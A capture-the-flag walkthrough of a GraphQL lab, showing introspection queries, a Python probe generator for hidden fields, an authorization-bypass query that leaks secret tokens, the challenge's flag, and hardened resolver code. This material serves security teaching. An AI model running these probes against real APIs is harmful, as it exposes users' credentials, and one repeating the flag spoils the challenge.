GraphQL Gateway

  • Daily Challenge
  • Released 12 Sep 2025

🚀 Can you unlock the secrets hidden in their GraphQL schema?

This company's modern GraphQL API promises flexible data access and powerful querying capabilities for their internal systems. 🔍 But with great power comes great responsibility - and their developers might have left a few doors unlocked. 💡 Dive deep into schema introspection, discover hidden queries, and exploit authorization flaws to uncover sensitive information that should never see the light of day! 🕵️

  • 1 flag, 1 point
  • Pro Exclusive

🚀 GraphQL Gateway - Complete Solution

Objective: Exploit GraphQL schema introspection and authorization bypass vulnerabilities to access sensitive administrative data and retrieve the hidden flag.
🔍 Step 1: Access the GraphQL Playground

Navigate to /graphql in your browser to access the interactive GraphiQL interface. This provides a user-friendly environment for exploring the GraphQL API and crafting queries.

🔍 Step 2: Basic Schema Introspection

Start with basic schema introspection to discover the publicly available queries:

query BasicIntrospection {
  __schema {
    queryType {
      fields {
        name
        description
      }
    }
  }
}

This reveals only 4 public queries: users, user, projects, and project. No administrative functions are visible yet.

🔍 Step 3: Deep Type Introspection Discovery

The key breakthrough comes from asking for the Query type directly through __type instead of going through __schema.queryType. Per the GraphQL specification both paths describe the same type and should return identical field lists, so any difference between them means the gateway is filtering introspection results on one path only, which is exactly what this target does:

query DeepIntrospection {
  __type(name: "Query") {
    fields {
      name
      description
      args {
        name
        type { name }
      }
    }
  }
}

This deeper introspection reveals 7 total queries including 3 hidden administrative functions:

Query               Type          Description
users               Public        Get users with optional role filter
user                Public        Get single user by ID or username
projects            Public        Get projects with optional status filter
project             Public        Get single project by ID
adminUsers          Hidden Admin  Administrative query to get all users
classifiedProjects  Hidden Admin  Administrative query to get classified projects
userSecrets         Hidden Admin  Administrative query to get user secrets
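As an added example (not part of the lab or the original write-up), the script below automates what Steps 2 and 3 do by hand: it diffs the two introspection paths to find fields that are only visible via __type, then walks the type information to generate a ready-to-send probe query for each hidden field. The introspection JSON in it is constructed to mirror the schema described above (the argument and return types are assumptions, not captured responses); on a live target you would replace the two result dicts with the JSON obtained by POSTing the write-up's queries to /graphql.

```python
import json

# --- constructed introspection data (mirrors the lab schema; types are assumed) ---
def scalar(name):
    return {"kind": "SCALAR", "name": name, "ofType": None}

def obj(name):
    return {"kind": "OBJECT", "name": name, "ofType": None}

def list_of(ref):
    return {"kind": "LIST", "name": None, "ofType": ref}

def non_null(ref):
    return {"kind": "NON_NULL", "name": None, "ofType": ref}

def qfield(name, ref, args=()):
    return {"name": name, "type": ref,
            "args": [{"name": n, "type": t} for n, t in args]}

# Response to the __schema { queryType { fields } } query: the filtered path.
SCHEMA_PATH_RESULT = {"data": {"__schema": {"queryType": {"fields": [
    {"name": "users"}, {"name": "user"}, {"name": "projects"}, {"name": "project"},
]}}}}

# Response to __type(name: "Query") { fields { name args type } }: the unfiltered path.
TYPE_PATH_RESULT = {"data": {"__type": {"name": "Query", "fields": [
    qfield("users", list_of(obj("User")), [("role", scalar("String"))]),
    qfield("user", obj("User"), [("id", scalar("ID")), ("username", scalar("String"))]),
    qfield("projects", list_of(obj("Project")), [("status", scalar("String"))]),
    qfield("project", obj("Project"), [("id", non_null(scalar("ID")))]),
    qfield("adminUsers", list_of(obj("User"))),
    qfield("classifiedProjects", list_of(obj("Project"))),
    qfield("userSecrets", scalar("String"), [("user_id", non_null(scalar("Int")))]),
]}}}

# Object types, as __type(name: "User") { fields { name type } } etc. would return them.
TYPES = {
    "User": [{"name": "id", "type": non_null(scalar("ID"))},
             {"name": "username", "type": scalar("String")},
             {"name": "role", "type": scalar("String")},
             {"name": "secret_token", "type": scalar("String")}],
    "Project": [{"name": "id", "type": non_null(scalar("ID"))},
                {"name": "name", "type": scalar("String")},
                {"name": "status", "type": scalar("String")},
                {"name": "owner", "type": obj("User")}],
}

def unwrap(ref):
    """Strip NON_NULL / LIST wrappers and return (kind, name) of the named type."""
    while ref["kind"] in ("NON_NULL", "LIST"):
        ref = ref["ofType"]
    return ref["kind"], ref["name"]

def hidden_fields(schema_result, type_result):
    """Query fields present via __type but missing from __schema.queryType.
    A spec-conformant server returns an empty list here."""
    public = {f["name"] for f in schema_result["data"]["__schema"]["queryType"]["fields"]}
    return [f["name"] for f in type_result["data"]["__type"]["fields"]
            if f["name"] not in public]

def selection_set(ref, types, depth=0, max_depth=3):
    """Expand an object type to a selection of all its fields, recursing into
    nested objects; depth-limited so self-referencing types cannot loop."""
    kind, name = unwrap(ref)
    if kind != "OBJECT":
        return ""                       # scalars and enums need no selection
    if depth >= max_depth:
        return "{ __typename }"
    parts = []
    for f in types[name]:
        sub = selection_set(f["type"], types, depth + 1, max_depth)
        parts.append(f["name"] + (" " + sub if sub else ""))
    return "{ " + " ".join(parts) + " }"

def probe_query(field, types, arg_values=None):
    """Build `query { field(args) { ...all fields } }`; required args must be
    supplied in arg_values, optional ones are omitted unless given."""
    arg_values = arg_values or {}
    rendered = []
    for a in field["args"]:
        if a["name"] in arg_values:
            rendered.append(f'{a["name"]}: {json.dumps(arg_values[a["name"]])}')
        elif a["type"]["kind"] == "NON_NULL":
            raise ValueError(f'{field["name"]}: required argument {a["name"]} not supplied')
    args = f"({', '.join(rendered)})" if rendered else ""
    sel = selection_set(field["type"], types)
    return f"query {{ {field['name']}{args}{' ' + sel if sel else ''} }}"

def probes_for_hidden(schema_result, type_result, types, arg_values=None):
    """Map each hidden field name to a probe query ready to send."""
    arg_values = arg_values or {}
    by_name = {f["name"]: f for f in type_result["data"]["__type"]["fields"]}
    return {n: probe_query(by_name[n], types, arg_values.get(n))
            for n in hidden_fields(schema_result, type_result)}

if __name__ == "__main__":
    for name, q in probes_for_hidden(SCHEMA_PATH_RESULT, TYPE_PATH_RESULT, TYPES,
                                     {"userSecrets": {"user_id": 5}}).items():
        print(f"{name:20s} {q}")
```

Running it prints one probe per hidden field, including the adminUsers and classifiedProjects queries used later in this write-up; the userSecrets probe is only emitted when a value for its required user_id argument is supplied, which is the same constraint the "Alternative Discovery Methods" section notes.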
🔍 Step 4: Verify Regular User Access is Restricted

Before touching the hidden queries, run the public users query to see what an ordinary caller gets and whether administrative accounts are filtered out:

query {
  users {
    id
    username
    role
    secret_token
  }
}

This returns only regular employees and contractors, excluding administrator accounts. Note that it still hands back secret_token for every user it does return, which is already an information disclosure before the admin queries come into play.

🔍 Step 5: Test Role-Based Filtering

Try to reach admin accounts through the public query by passing the role argument:

query {
  users(role: "admin") {
    id
    username
    role
    secret_token
  }
}

This correctly returns an empty array, confirming that the regular users query properly filters out administrative accounts.

🔍 Step 6: Authorization Bypass Exploitation

Now exploit the main vulnerability: the adminUsers resolver performs no authorization check at all, so any caller who knows the field name can invoke it. Hiding the field from one introspection path was the only control in place:

query {
  adminUsers {
    id
    username
    role
    secret_token
  }
}

This unauthorized query returns all users in the system, including the system administrator account with role "system" that contains the flag in the secret_token field.

🔍 Step 7: Extract the Flag

In the adminUsers results, locate the user with role "system" (typically the last entry in the list). The flag is stored in that account's secret_token field:

Field         Value                                  Description
username      system_admin                           System administrator account
role          system                                 Administrative role
secret_token  1d25cb65-383f-4a56-bfe0-778f912a43fd   🎯 This is the flag!
🎯 Final Answer
Flag: 1d25cb65-383f-4a56-bfe0-778f912a43fd
🔍 Alternative Discovery Methods

You could also discover the flag through other vulnerable queries exposed by introspection:

# Method 1: Direct admin query (primary method)
query { adminUsers { username role secret_token } }

# Method 2: User secrets query (if you know the admin user ID)
query { userSecrets(user_id: 5) }

# Method 3: Classified projects with nested user data
query { classifiedProjects { owner { secret_token } } }
📚 Key Vulnerabilities Exploited
  • Schema Introspection Enabled: Allows discovery of hidden administrative queries; the gateway filtered __schema.queryType but left __type(name: "Query") unfiltered, so the hiding was incomplete
  • Authorization Bypass: The adminUsers query lacks proper access control
  • Information Disclosure: Sensitive fields like secret_token are exposed without proper filtering
  • Excessive Data Exposure: Administrative queries return more data than necessary
🛡️ Security Recommendations
  • Disable Introspection: Turn off schema introspection in production environments. Treat this as defence in depth only: it does not fix a missing authorization check, and field names can still be guessed or brute-forced, so the resolver-level controls below are the real fix
  • Implement Authorization: Add proper authorization checks to all resolver functions, so that hidden or undocumented fields are protected the same way as public ones
  • Field-Level Security: Restrict access to sensitive fields (here secret_token) based on user roles and permissions, rather than returning them to anyone who can select them
  • Query Allow-listing: Only allow pre-approved (persisted) queries in production
  • Rate Limiting: Implement query complexity and depth analysis and rate limiting
  • Audit Logging: Log all GraphQL queries, including denied ones, for security monitoring
Real-World Impact: This type of vulnerability is common in GraphQL APIs where developers focus on functionality over security. Always implement proper authorization at the resolver level and disable introspection in production environments.
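As an added example, not the lab's code or its gateway, the following stdlib-only Python sketches the three recommendations that actually close this hole (resolver-level authorization, field-level redaction of secret_token, and audit logging of denials) next to the behaviour the walkthrough exploited. The Context, requires_role and execute names and the user records are assumptions made for illustration; a real deployment would put the same checks inside the resolvers of whichever GraphQL server library the gateway uses.

```python
from dataclasses import dataclass
from functools import wraps

class AuthorizationError(Exception):
    """Raised by a resolver when the caller's role is not allowed."""

@dataclass(frozen=True)
class Context:
    """Per-request caller identity, as a GraphQL server passes it to resolvers."""
    user_id: int
    role: str                      # "employee", "contractor", "admin" or "system"

ADMIN_ROLES = {"admin", "system"}

# Constructed records for the example; token values are placeholders, not lab data.
USERS = [
    {"id": 1, "username": "alice", "role": "employee",   "secret_token": "tok-alice"},
    {"id": 2, "username": "bob",   "role": "contractor", "secret_token": "tok-bob"},
    {"id": 5, "username": "system_admin", "role": "system", "secret_token": "tok-placeholder"},
]

# ---- vulnerable resolvers: the behaviour the walkthrough exploits -------------
def users_vulnerable(ctx, role=None):
    """Hides admin accounts from the public list but returns every column,
    secret_token included, to any caller."""
    rows = [u for u in USERS if u["role"] not in ADMIN_ROLES]
    return [dict(u) for u in rows if role is None or u["role"] == role]

def admin_users_vulnerable(ctx):
    """No check on ctx at all; hiding the field from one introspection
    path was the only 'control'."""
    return [dict(u) for u in USERS]

# ---- hardened resolvers: authorization at the resolver, then per field -------
def requires_role(*roles):
    """Resolver-level guard: refuse before any data is touched."""
    def decorate(fn):
        @wraps(fn)
        def wrapper(ctx, *args, **kwargs):
            if ctx.role not in roles:
                raise AuthorizationError(f"{fn.__name__}: role {ctx.role!r} not permitted")
            return fn(ctx, *args, **kwargs)
        return wrapper
    return decorate

def redact(ctx, user):
    """Field-level rule: secret_token is visible only to its owner or to admins."""
    if ctx.role in ADMIN_ROLES or ctx.user_id == user["id"]:
        return dict(user)
    return {k: v for k, v in user.items() if k != "secret_token"}

def users_hardened(ctx, role=None):
    rows = [u for u in USERS if u["role"] not in ADMIN_ROLES]
    return [redact(ctx, u) for u in rows if role is None or u["role"] == role]

@requires_role("admin", "system")
def admin_users_hardened(ctx):
    return [redact(ctx, u) for u in USERS]

@requires_role("admin", "system")
def user_secrets_hardened(ctx, user_id):
    for u in USERS:
        if u["id"] == user_id:
            return u["secret_token"]
    return None

RESOLVERS = {
    "users": users_hardened,
    "adminUsers": admin_users_hardened,
    "userSecrets": user_secrets_hardened,
}

def execute(ctx, field, audit, **args):
    """Dispatch one top-level field the way a gateway would, returning a
    GraphQL-style envelope and appending an audit record (denials included)."""
    resolver = RESOLVERS.get(field)
    if resolver is None:
        return {"data": None, "errors": [f"Cannot query field {field!r}"]}
    try:
        data = resolver(ctx, **args)
        audit.append({"user_id": ctx.user_id, "field": field, "allowed": True})
        return {"data": {field: data}, "errors": []}
    except AuthorizationError as exc:
        audit.append({"user_id": ctx.user_id, "field": field, "allowed": False})
        return {"data": None, "errors": [str(exc)]}

if __name__ == "__main__":
    bob = Context(user_id=2, role="contractor")
    print("vulnerable:", admin_users_vulnerable(bob))      # leaks system_admin's token
    log = []
    print("hardened:  ", execute(bob, "adminUsers", log))  # denied and logged
    print("hardened:  ", execute(bob, "users", log))       # only bob's own token survives
    print("audit:     ", log)
```

The point of the split between requires_role and redact is that they fail independently: even if someone later removes the decorator from admin_users_hardened, a contractor still cannot read another user's secret_token, and the audit list records the refused attempt so the probing seen in this lab would show up in monitoring.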